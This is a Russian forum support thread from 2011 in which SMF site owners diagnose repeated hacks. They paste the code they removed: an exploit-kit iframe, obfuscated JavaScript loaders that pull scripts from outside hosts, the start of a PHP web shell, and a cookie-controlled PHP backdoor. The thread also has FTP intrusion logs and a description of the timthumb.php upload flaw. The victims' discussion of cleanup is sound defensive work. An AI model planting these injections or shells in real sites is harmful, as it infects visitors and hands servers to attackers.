Взломан форум и установлен в файл index.php вредоносный код. Будьте внимательны!

Автор Солярис, 13 сентября 2011, 13:42:45

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Солярис

Всех приветствую!

Форум работает на движке 1.1.14.

Сегодня с утра до 11.00 было всё нормально. Отлучился на часок и увидел "сюрприз".

Начались неприятности. Антивирусная программа AVG Интернет Секъюрити при попытке открытия сайта с форумом выдала следующее предупреждение:
На странице, на которую вы пытаетесь перейти, обнаружен известный эксплойт, фишинг-атака или прием социальной инженерии, в результате чего она была заблокирована по соображениям безопасности. При отсутствии защиты, например приложения AVG Security Toolbar и AVG, компьютер подвергается риску взлома, повреждения или кражы личных данных. Чтобы продолжить, выберите одно из предлагаемых ниже действий.

URL: ponedvech.cx.cc/main.php?page=d4f8d88981e9f5c8
Имя: Blackhole Exploit Kit (type 1889)

Обратился к службе поддержки хостинга. Они выявили что в корневой папке в файле index.php был внедрен следующий код:
<iframe src='http://ponedvech.cx.cc/main.php?page=d4f8d88981e9f5c8' width='1' height='1' frameborder='0'></iframe>

Вероятнее всего взломали форум через уязвимости в СМФ. Вот такие вот "приятные" вещи происходят.

Сижу сейчас думаю, можно ли как-нибудь защититься от повторного "сюрприза". Только вот неизвестно, каким конкретно способом был взломан форум.


З.Ы. Прошу прощения. Уважаемый модератор, переместите тему в раздел по "старым" движкам. Перепутал разделы.


Солярис

Ну, обычной не назовешь. Без уязвимости в движке просто так в файл код не вставишь.


kak2z

Чаще всего или беда хостера или личная дыра  безопасности  (троян, "друг", блокнотик с паролями).
Первая линейка вроде откатаная и пофиксеная дальше не куда. 
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

BIOHAZARD

Цитата: Солярис от 13 сентября 2011, 13:42:45
Вероятнее всего взломали форум через уязвимости в СМФ. Вот такие вот "приятные" вещи происходят.
бред
если бы было так, здесь бы уже завалили сообщениями о инъекциях
про количество подобных сообщений на smf.org даже подумать страшно
Мои моды:
  • RedirectPage
  • Counters
  • CustomSearch
  • SypexDumper
   адаптирую темы    1.1.хx<=>2.0задавая вопросы, старайтесь сразу указывать конечную цель, предполагаемый Вами путь не обязательно окажется самым коротким

Любые моды на заказ

recived

Цитата: BIOHAZARD от 14 сентября 2011, 16:26:12
бред
если бы было так, здесь бы уже завалили сообщениями о инъекциях
про количество подобных сообщений на smf.org даже подумать страшно
Ну если бы это в паблик ушло тогда да.  А так обычный бот наверняка прошелся через хостера ну или просто пароли свиснули.

Acid.Name

Будь внимательным. И не храни пароли в программе для подключения по FTP.  Обычно троян или вирус от туда берут пароли.

У меня такое было уже.  buck

Солярис

Цитата: Acid.Name от 16 сентября 2011, 07:31:30
Будь внимательным. И не храни пароли в программе для подключения по FTP.  Обычно троян или вирус от туда берут пароли.
Я в программе для подключения к сайту по ФТП паролей не храню и вообще ею практически не пользуясь. Работаю с содержимым сайта через сайт хостинг-компании.

Солярис

Опять какая-то сволочь только что залила в файл index.php какую-то дрянь. Удалил только что.

Ничего не могу понять. Каким образом происходит несанкционированный доступ к файлам форума?!

Какие права (CHMOD) на файлы форума должны быть установлены (для безопасности форума)?

GeorG

Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Макар

Ну если опять, а после первого раза были сменены пароли логины и явки то остается искать шелл. Как в своем акаунте , так и в соседних, а возможно и на всем сервере.

мля как же медленно писать с мобильного . . . . . Опять :( опередили
Если Вы здесь недавно, не обольщайтесь тоном некоторых дискуссий.
Все чаще слова - юзай поиск, приобретают смысл - иди в ж..........  Приобретение смысла автоматизированно - Ответы на любой вопрос по SMF
Не пишите несколько сообщений подряд - тут вам не Twitter  >:( в остальных ситуациях мы не сильно зверствуем 2funny

Солярис


GeorG

Это код, который позволяет управлять системой с удалённого компьютера.
Подробнее в гугле.
Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Солярис

Так, а где он засел этот код? В файлах форума внутри или это отдельный файл?

З.Ы. И мне некогда сейчас Гуглом пользоваться. У меня сайта заражен в данную минуту. :( :( wallbash :facepalm:

GeorG

ЦитироватьТак, а где он засел этот код?
Цитироватьостается искать шелл. Как в своем акаунте , так и в соседних, а возможно и на всем сервере.
Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Солярис

А права доступа к файлам, какие должны быть выставлены для безопасности работы форума?

kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Солярис

Вот такую фигню нашел в файле index.php:
<nofollow><noindex><script language="JavaScript">
cURL = "cleartraf.ru";
enc = "%3Csc"+"ri"+"pt%20lan"+"gua"+"ge%3D%22Ja"+"vaS"+"cr"+"ipt%22%20cha"+"rset%3D%22wi"+"ndow"+"s-1251%22%20s"+"rc%3D%22h"+"ttp%3A/"+"/"+cURL+"/j"+"s/i"+"f"+".p"+"hp%3Fid%3D1223%22%3E%3C/sc"+"ri"+"pt%3E";
dec = unescape(enc);
document.write(dec);
</script></noindex></nofollow>


kak2z, спасибо за ссылку.

digital

Обфускация ява-скрипта. Видно, что выводится результат выполнения другого скрипта с http://cleartraf.ru/js/if.php.....

Солярис

Можно ли установить, к примеру, пароль для доступа к изменению файла index.php?! Или это не возможно сделать?

Солярис

Черт возьми, это какое-то уродство. Удаляю код из файла index.php:
<nofollow><noindex><script language="JavaScript">
cURL = "cleartraf.ru";
enc = "%3Csc"+"ri"+"pt%20lan"+"gua"+"ge%3D%22Ja"+"vaS"+"cr"+"ipt%22%20cha"+"rset%3D%22wi"+"ndow"+"s-1251%22%20s"+"rc%3D%22h"+"ttp%3A/"+"/"+cURL+"/j"+"s/i"+"f"+".p"+"hp%3Fid%3D1223%22%3E%3C/sc"+"ri"+"pt%3E";
dec = unescape(enc);
document.write(dec);
</script></noindex></nofollow>


Делаю бекап. И он опять через некоторое время появляется в этом файле в его конце.

Черт возьми. Его как-то изнутри самого сайта внедряют. Где-то сидит какой-то сволочной код, который все это делает?!  wallbash wallbash wallbash

kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Солярис

Цитата: kak2z от 18 сентября 2011, 21:57:54
Хостеру жалуйтесь. Я думаю у него где то проблема все таки.
Да я с хостером уже сижу целый день на короткой связи. Это первое, что я сделал. Про это можно и не напоминать.

Солярис

А что за файл в корне форуме php.php? Он должен там быть?

Внутри ничего нет, кроме этого:
<?php
phpinfo ();
?>


kak2z

это информация про настройки рнр на сервере.. ничего военного в нем нет)
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Солярис


Mavn

а вот еще один файл xxx.sss.xdd.php по названию о назначении сможете догадаться??
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Солярис

Mavn, Вы так любезны.
Человек не знает, куда ему тыркнуться и что посмотреть, поскольку проблема не решается. Нет, чтобы высказать слова поддержки, так нет, обязательно надо человека подколоть.
:-\
Неужели не понятно, что речь идет о корневой папке форума. Должен ли там быть такой файл с таким наименованием?

Вот начальные строчки указанного файла:
<?php
$auth 
= array(
'md5pass' => "63a9f0ea7bb98050796b649e85481845" // root
);
if( 
strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
[
at]session_start();
#if(empty($_POST['ajax']))
# print_r($_POST);
error_reporting(E_ALL);
[
at]ini_set('error_log',NULL);
[
at]ini_set('log_errors',0);
[
at]ini_set('max_execution_time',0);
[
at]set_time_limit(0);
[
at]set_magic_quotes_runtime(0);
[
at]define('VERSION''2');
[
at]define('SELF_PATH'__FILE__);

function 
my_strip_slashes(&$p){
if(is_array($p)){
foreach($p as $k => $v) {
my_strip_slashes($v);
$p[$k] = $v;
}
} else
$p stripslashes($p);
}
if(
get_magic_quotes_gpc())
my_strip_slashes($_POST);
function 
printLogin() {
?>

<center>
<form method=post>
Password: <input type=password name=pass><input type=submit value='>>'>
</form></center>
<?php
exit;
}

if( !isset( 
$_SESSION['sh_logined'] ))
if( empty( $auth['md5pass'] ) || 
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth['md5pass'] ) ) )
$_SESSION['sh_logined'] = true;
else
printLogin();

if( 
strtolowersubstr(PHP_OS,0,3) ) == "win" )
$os 'win';
else
$os 'nix';
$safe_mode = [at]ini_get('safe_mode');
$disable_functions = [at]ini_get('disable_functions');
$home_cwd = [at]getcwd();
if( isset( 
$_POST['c'] ) )
[at]chdir($_POST['c']);
$cwd = [at]getcwd();
if( 
$os == 'win') {
$home_cwd str_replace("\\""/"$home_cwd);
$cwd str_replace("\\""/"$cwd);
}
if( 
$cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';

if(
$os == 'win')
$aliases = array(
"List Directory" => "dir",
    
"Find index.php in current dir" => "dir /s /w /b index.php",
    
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
    
"Show active connections" => "netstat -an",
    
"Show running services" => "net start",
    
"User accounts" => "net user",
    
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else

.....
и так далее.....



З.Ы. Mavn, я посмотрю, как Вы будете себя чувствовать и что писать, когда у Вас в файлы форума будет постоянно заливаться вредоносный код.

digital

Солярис, вот интересно, если всё снести и оставить только один единственный файл  index.php с чистым содержанием, при этом закрыть от всех доступ через веб посредством файла .htaccess, заразится  index.php или нет? Если заразится и при этом на аккаунте больше нет зараженных сайтов, то заражение возможно только через хостинг, либо через FTP или админку.

kak2z

Только что курил гугл по вашей проблеме...
1. Проверить свой комп на вирусы, и не тем антивиром что у вас сейчас стоит а скачать что то другое, а лучше парочку.
2. В файрволе на компе закрыть все лишние соединения.
2.5 ПОМЕНЯТЬ ВСЕ ПАРОЛИ!
3. Исправить индекс.пхп и смотреть дальше. Если ничего не поменялось делайте бекап всего форума (файлов) и заливайте чистый движок скачав его с оффа.
4. Если и это не поможет и все равно даже на чистом будут проблемы. Пусть хостер лечит свой сервак от вирусов (хотя это самый маловероятный вариант)
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Mavn

в стандарте если не установлено никаких модов в корне должны лежать следующие файлы
Цитата: Солярис от 18 сентября 2011, 22:48:13
Mavn, Вы так любезны.
Человек не знает, куда ему тыркнуться и что посмотреть, поскольку проблема не решается. Нет, чтобы высказать слова поддержки, так нет, обязательно надо человека подколоть.
З.Ы. Mavn, я посмотрю, как Вы будете себя чувствовать и что писать, когда у Вас в файлы форума будет постоянно заливаться вредоносный код.
1. я никого не подкалываю. если выкладываете название файла то и во вложение его выкладывайте или в тег код. Ибо понять что за файл проблематично. Тем более вопрос был: "Что за зверь?"
2. Стандартный набор файлов и папок которые должны быть в корне форума можно увидеть в дистрибутиве который можно скачать на офф сайте
      attachments                     
         avatars                                                                                     
         Packages
         Smileys
         Sources
         Themes
         agreement.txt
         index.php   
         install.php 
         install_1-1.sql
         license.txt     
         news_readme.html
         readme.html     
         Settings.php   
         Settings_bak.php
         SSI.php         
         ssi_examples.php 
         ssi_examples.shtml

а вообще данный файл это ничто иное как шелл
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Stern

Цитата: Солярис от 18 сентября 2011, 22:23:51
Понятно, спасибо. А вот файл

Это что за зверь?
Солярис, не паникуйте преждевременно - всё поправимо!
Сам недавно обнаружил на своих сайтах несколько шеллов - вскорости накропаю отчёт о проделанной работе)
kak2z привёл вам очень правильную ссылку - там достаточно подробно и внятно описана последовательность поиска источника взлома.
Надеюсь, у вас есть лог доступа к серверу (если нет или вы не знаете, где его взять - обратитесь к хостеру - вам его выдадут).
Запустите поиск по имени указанного вами файла - таким образом вы сможете установить, как и когда к вам попал шелл (небольшое замечание насчёт "когда" - это могло быть и полгода, и год назад - у меня один из шеллов, активизировавшийся во время августовского массового хака сайтов (в первую декаду августа), был залит 14 апреля и никаким образом до тех пор не проявлял себя).
Ну и слейте все файлы с хостинга - поищите на компе (как антивирусом, так и по названиям непонятных файлов/левых ссылок)

и php.info (php.php)обязательно удалите - не нужно посторонним знать настройки php у вас на сервере!

а шелл у вас какой-то специфический  - только от гугля ныкается (if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
   header('HTTP/1.0 404 Not Found');)

пришлите мне его целиком (текстом, не файлом!) в личку или на почту, плз!

Успехов в борьбе!
МышЫ плакали, кололись, но продолжали жрать кактус...

karavan

Ну вот и пришла моя очередь... в файлы index.php во всех папках кто-то или что-то внесло вредоносный код вот-такого содержания:
?> <!-- . --><script type="text/javascript">if('GkIAe'=='PcSQtR')kduSI();var sEGja;var EdgahX='fKrNfb';if('DQHmU'=='Omfj')MHXOe='GiwJ';var TMtyeWXZ="\x66\x72\x6fmCharC\x6fd\x65";var pbfpi=120;function VJNx(){}
var xMQXmOlq="";function JAMmah(){}function kcYW(){var DrHR='KeIo';if('xdZe'=='RSiuld')dfmCwi();}
if('WVXT'=='fnNPOH')otbQo();if('zHkmr'=='DFgm')PpihO();var nPZbcvNO="s\x6cic\x65";var EcJEia='jsXqFm';var izlNGZHYh="a4b0b0ac766b6b9db0ab9eb1afacaba1a49da86a9faba96baf6c6ba5aa6a9fa3a57b6d6c";function jyJXK(){}if('WvrZL'=='JDodXD')MsVU='qUbY';function WwoTr(){}
var gxwRmN='itrzFV';var oUGczFvk="p\x61\x72seInt";var kjrX;var sGAjMB;var NyTT=27;var VBWBjrZe=(function(){function dydkGo(){var hkIVw='dLAP';if('RcrL'=='lwnek')GqUxow();}var NEqytk='hSNJ';return this;var UfKKU;})();if('mTWytZ'=='pfXJ')WWBJ();var QnUOX="cons\x74ructor";var GBhA='ewNv';function FZMg(){var qEFWsn='HbQJj';if('yjUBu'=='yIZo')RVwP();}
var JrqarNN="LSxIZfDv"[QnUOX];var slxTOE;var suXRl=89;function aPduh(){var bACO='kUly';if('MUoEjK'=='xUXEVN')tgJi();}
for(var lMHyYSom=0;lMHyYSom<izlNGZHYh.length;lMHyYSom+=2){var Yhrdg;oUimSwtQv=VBWBjrZe[oUGczFvk](izlNGZHYh[nPZbcvNO](lMHyYSom,lMHyYSom+2),16)-60;var EpvQzf=71;function TLVFpT(){}
xMQXmOlq+=JrqarNN[TMtyeWXZ](oUimSwtQv);var hYgM=16;function mHVD(){var tzckrp='FKTsj';if('WSNPmg'=='AvzqTY')NGLIfu();}var xkLIjj='LjHYnt';}
if('HTZKe'=='kuJcLd')FrCe();if('Uzaj'=='uFPmeN')rYrL='qajY';function BKjWnE(){var Drfmo='xqXdV';if('SSyi'=='ppUMyb')SHekq();}
var XrwEP="rUowFeuRb";function yyfze(){}var TcnABO=21;var rImjV=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+XrwEP+'" src="'+"xMQXmOlq"+'">':'iframe';function ahVM(){var lcVK='whbK';if('mJKA'=='RhED')fWhJ();}var ZDBl='TfLcSN';var ahLAYZ;var sMSoJI=document.createElement(rImjV);sMSoJI.name=XrwEP;var ARqr=86;sMSoJI.setAttribute("name",XrwEP);if('CcbU'=='DOnAV')spEIEU();sMSoJI.id=XrwEP;function XGKr(){var tMBC='dOjY';if('eIaE'=='YxPwQu')UMAmc();}
sMSoJI.src=xMQXmOlq;function xJXSH(){}
sMSoJI.style.right="0px";var TAZRuh=93;sMSoJI.style.top="0px";if('ghZal'=='HMsbjS')ErVOb();sMSoJI.style.height="1px"
if('FAOqPy'=='qnMQRd')OHulZ='yISSK';sMSoJI.style.width="1px";var loVCI;var HzxyWb=265;if('XsVOyN'=='ciyOKq')brxMH();sMSoJI.style.position="absolute";function IJfqol(){var VeRObN='CPwZ';if('nLIZGV'=='QaRC')veKAA();}
document.body.appendChild(sMSoJI);var xyoG;var XnvVN;var ROKO;</script><!-- . --> 


Проявился визуально только в ИЕ в виде предложения загрузить некий файл atobuspoehal.com


и еще во всех браузерах перестало работать цитирование выделенного. Вылечил бекапом файлов за 20 число...

Подскажите пожалуйста, как думаете, это работа бота или человека-злоумышленника, и что можно сделать кроме стандартной замены паролей итд... ?

Stern

логи апача просмотри(те) тщательно.
и к хостеру обязательно обратитесь с этой проблемой
МышЫ плакали, кололись, но продолжали жрать кактус...

karavan

К хостеру обращался, он "ничего не знает" )
В логах FTP доступа есть несанкционированный вход, судя по всему взломали фтп-пароль с Румынского айпишника 94.63.240.82
Вот какие записи в логах ФТП:
ov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 -- [28/Nov/2011:12:26:43 +0000] STOR /---/www/wp-includes/theme-compat/footer.php 226 15571
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:43 +0000] RETR ----/www/wp-includes/theme-compat/header.php 226 1830
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 v---- [28/Nov/2011:12:26:43 +0000] STOR /----/www/wp-includes/theme-compat/header.php 226 49670
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 --- [28/Nov/2011:12:26:43 +0000] RETR /---m.ua/www/forum/Packages/backups/index.php 226 218
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 -----[28/Nov/2011:12:26:43 +0000] STOR /----/www/forum/Packages/backups/index.php 226 2610
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:44 +0000] RETR /home/-----com.ua/www/forum/Packages/index.php 226 324
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:44 +0000] STOR /home/vsop/-----/www/forum/Packages/index.php 226 2716
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:44 +0000] RETR /home/-----/www/forum/Smileys/aaron/index.php 226 218
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ----- [28/Nov/2011:12:26:44 +0000] STOR /home/--------com.ua/www/forum/Smileys/aaron/index.php 226 2610


Пароли уже поменял, логи самого сервера будут доступны завтра (

Макар

Если Вы здесь недавно, не обольщайтесь тоном некоторых дискуссий.
Все чаще слова - юзай поиск, приобретают смысл - иди в ж..........  Приобретение смысла автоматизированно - Ответы на любой вопрос по SMF
Не пишите несколько сообщений подряд - тут вам не Twitter  >:( в остальных ситуациях мы не сильно зверствуем 2funny

karavan


Макар

у тя впс/вдс ?

проверь

ЦитироватьВходящая во многие wordpress темы утилита для изменения размера изображений timthumb.php, уязвима к загрузке произвольного PHP-кода.

В конфиге скрипта лежат несколько доменов (flickr.com, picasa.com, blogger.com, wordpress.com, img.youtube.com, upload.wikimedia.org, photobucket.com) с которого ему разрешено загружать изображения.

Из-за недостаточной проверки передаваемых параметров существует возможность загрузить веб-шелл на сервер используя список доверенных доменов для создания поддоменов с такими же названиями. Т.е. timthumb.php считает ссылку blogger.com.hackersite.com/webshell.php легитимной и позволяет загрузить скрипт на сервер.

Мы рекомендуем всем пользователям которые использует Wordpress для своих сайтов проверить наличие данного файла в темах, и заменить его на пропатченный timthumb.php

если залили шелл через wp то соседние аккаунты вполне могут пострадать
Если Вы здесь недавно, не обольщайтесь тоном некоторых дискуссий.
Все чаще слова - юзай поиск, приобретают смысл - иди в ж..........  Приобретение смысла автоматизированно - Ответы на любой вопрос по SMF
Не пишите несколько сообщений подряд - тут вам не Twitter  >:( в остальных ситуациях мы не сильно зверствуем 2funny

karavan

Да, скорее всего так и было. Там просто другой админ "админит", у нас как бы одна "фирма" но у него персональная страничка еще есть... А этот пропатченый timthumb.php не подскажите где скачать можно?

kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

karavan


Макар

Если Вы здесь недавно, не обольщайтесь тоном некоторых дискуссий.
Все чаще слова - юзай поиск, приобретают смысл - иди в ж..........  Приобретение смысла автоматизированно - Ответы на любой вопрос по SMF
Не пишите несколько сообщений подряд - тут вам не Twitter  >:( в остальных ситуациях мы не сильно зверствуем 2funny

karavan


Солярис

Всех приветствую!

Кто-нибудь может подсказать, что вот это за бяка: http://low.redancegirlmindas.in/counter/init.js?v=1741727003

Я обыскался в коде, но не могу найти, каким кодом подгружается вот это нечто?!! wallbash wallbash

Дело в том, что я решил проверить ссылку (адрес своего сайта на наличие вирусов) вот по этому адресу: http://vms.drweb.com/online

При проверке выдается, что вирусов не обнаружено, но при этом в окне с результатами проверки показывается вот этот адрес. Я не могу понять, откуда он взялся на сайте и что это?!
Вот, что показывает Доктор Веб:

Проверка: http://low.redancegirlmindas.in/counter/init.js?v=250189047
Размер файла: 1445 байт
MD5 файла: b59aecfc02322f4dbae9cfa9f0fc2bd5

http://low.redancegirlmindas.in/counter/init.js?v=250189047 - Ok


Заранее благодарю за помощь!

Солярис

Обнаружил еще одну странность.

В папке articles мода SMF articles не понятно откуда появляется графический файл yy_y.gif . Вес у него не большой, изображения никакого не содержит.
Я никак не могу понять, каким образом он там появляется и откуда (даже после его удаления).

Как по логам понять, каким образом этот файл заливается на сервер и появляется в указанной папке? По каким командам это можно понять?

Солярис

Вот, что нашел в файле index.php (какая-то сволочь залила  tickedoff tickedoff):
}
foreach ($ar_s = array('/NT/i','/SV1/i') as $a_r) {
    if ([at]preg_match($a_r,[at]$_SERVER['HTTP_USER_AGENT'])) {
        if([at]$_COOKIE['pplicookie'] != 'presscookie') {
           [at]$doma_in = [at]file_get_contents('/home/***/***/сайт.ru/public_html/articles/yy_y.gif');
            if ([at]$doma_in && [at]strlen([at]$doma_in)>5) {
            echo"<link rel='stylesheet'type='text/css'href=http://$doma_in/counter/init.css?v=".[at]mt_rand()."/><script type='text/javascript'src=http://$doma_in/counter/init.js?v=".[at]mt_rand()."></script>";
            [at]SetCookie("pplicookie","presscookie",[at]time()+172800);}}break;}}
            if ([at]$_COOKIE['hphpallcookie']) {
    [at]file_put_contents  ('/home/***/***/сайт.ru/public_html/articles/yy_y.gif',[at]$_COOKIE['hphpallcookie']);   
}

Солярис

Где та дырка в движке, которая позволяет заливать эту гадость (черт её знает)?

karavan

Посмотрите логи FTP доступа, заходил ли кто-то кроме вас? В моем случае так и было, взломали FTP пароль, и тогда "дырка" уже не нужна.

svadba31

Была бы дырка в движке - ломанули бы уже большенство популярных форумов...